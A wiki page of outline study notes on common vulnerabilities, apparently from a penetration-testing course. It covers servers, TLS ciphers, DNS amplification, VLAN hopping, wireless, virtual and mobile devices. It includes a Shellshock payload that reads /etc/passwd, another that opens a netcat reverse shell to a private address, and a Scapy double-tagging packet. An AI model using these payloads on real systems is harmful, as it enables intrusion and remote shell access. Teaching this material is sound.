Common Vulnerabilities - Paiet/Tech-Journal-for-Everything GitHub Wiki

Common Vulnerabilities Pt.1

  • Servers/Endpoints
    • Missing Patches
    • Unsupported OS and/or Apps
    • Buffer Overflows
    • Priv Esc
    • Arbitrary Code Execution - Remote Code Execution
      • Shellshock Demo
        • In "User Agent" field
        • Test for Shellshock
          • () { :;}; echo $(</etc/passwd)
        • Start listener
        • () { :;}; /usr/bin/nc -nv 192.168.55.196 9999 -e /bin/bash

Common Vulnerabilities Pt.2

  • Insecure Protocol use

    • FTP
    • Telnet

  • Debugging Modes

    • Used to help dev troubleshoot issues
    • May leak critical info
      • Database info
      • Authentication mechanisms

  • Network infrastructure

  • SSL/TLS issues

    • They are not the same
      • SSL is compromised and insecure
      • TLS replacement for SSL
    • The latest version should be used
      • Sometimes older versions are used for backward compatibility

  • Insecure ciphers

    • Not all cipher suites are made equally
    • Cipher negotiation
      • Client contacts server and requests secure connection
        • ClientHello message
        • List of supported ciphers sent to server
      • Server responds with ServerHello message
        • Defines the cipher that will be used for the conversation
        • Typically uses the most secure cipher that both client and server support
    • nmap --script ssl-cert,ssl-enum-ciphers -n -p 443 nicholas.com

  • Certificate issues

    • Cert name and Server Name mismatch
      • Could be a fake cert taken from a legit site
    • Cert expiration
      • Probably just forgot to renew
    • Unknown CA
      • Can you trust certs from a CA that isn't known?
        • If they're yours. YES

  • DNS

    • All the oldies but goldies
      • patches, buffer overflows, code exec, etc.
    • Amplification attacks
      • Attacker sends DNS requests using IP of target/victim
      • Requests are small, but replies are much bigger
      • Replies are sent to victim
        • Isn't DoS fun

  • Internal IP Disclosure

    • Helps attackers map internal systems behind firewall
    • Can see these show up in HTTP headers

Common Vulnerabilities Pt.3

  • Network appliances

  • Load balancers

  • Firewalls

  • Routers

  • Switches

    • VLAN Double-Tagging
      • Adding an additional VLAN tag to Ethernet frame
      • Allows you to perform VLAN Hopping attack
      • Attacker must be on native VLAN
    • VLAN Hopping
      • Because of double-tagged frame
        • SwitchA receives double-tagged frame and strips off first tag
          • Native VLAN is not retagged
        • SwitchA forwards frame to SwitchB over trunk link
        • SwitchB sees tag for desired VLAN and forwards frame to victim
    • Craft attack with Scapy
      • sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:50:56:39:25:60')/Dot1Q(vlan=1)/Dot1Q(vlan=20)/ IP(dst='255.255.255.255', src='192.168.1.204')/ICMP(), iface='eth1')
      • Breakdown of commands
        • Source MAC address: 00:50:56:39:25:60
        • Destination MAC address: broadcast
        • Inner VLAN tag 20
        • Outer VLAN tag 1
        • Destination IP address: broadcast
        • Source IP address: 192.168.55.204
        • Outgoing interface: eth1

Common Vulnerabilities Pt.4

  • Wireless AP
    • No security or poor security
      • Still using default settings
        • SSID
        • Username:Password
      • Employing weak password
      • Employing weak encryption
    • Insecure physical access
      • Located in break room on top of cabinet
    • Rogue Access Points
      • Users unintentionally send sensitive data through Rouge AP
    • Evil Twin
    • Session Hijacking
    • Man-In-The-Middle
    • DoS

Common Vulnerabilities Pt.5

  • Virtual infrastructure

  • VM Escape

  • Virtual hosts

    • Patching

  • Virtual networks

    • Same as real networks

  • Management interface

    • Super sensitive
    • Employ strong authentication/access Methods
      • 2FA/MFA
      • Firewall/ACLs
      • No public access
      • Jump Box/SAW - Mobile devices

  • Malware

  • Device vulns

    • Unpatched OS
    • Jailbroken/Rooted
      • Allows sideloaded apps
      • Could install malware

  • Lost/Stolen

    • Taken everywhere (hence the term "mobile")
    • Inviting target for thieves
    • 70million smartphones lost each year
      • Only 7% recovery

  • Communication interception

    • They tend to get connected to insecure networks - Interconnected networks - Virtual Private Networks (VPNs)

  • Check for current patching

  • Check for use of insecure ciphers - Industrial Control Systems (ICSs) and SCADA devices

  • Buffer overflows

  • Authentication bypass

  • Hard-coded creds

  • Insecure protocols/Cleartext data

  • CSRF

  • XSS

  • Unrestricted File Upload

  • SQLi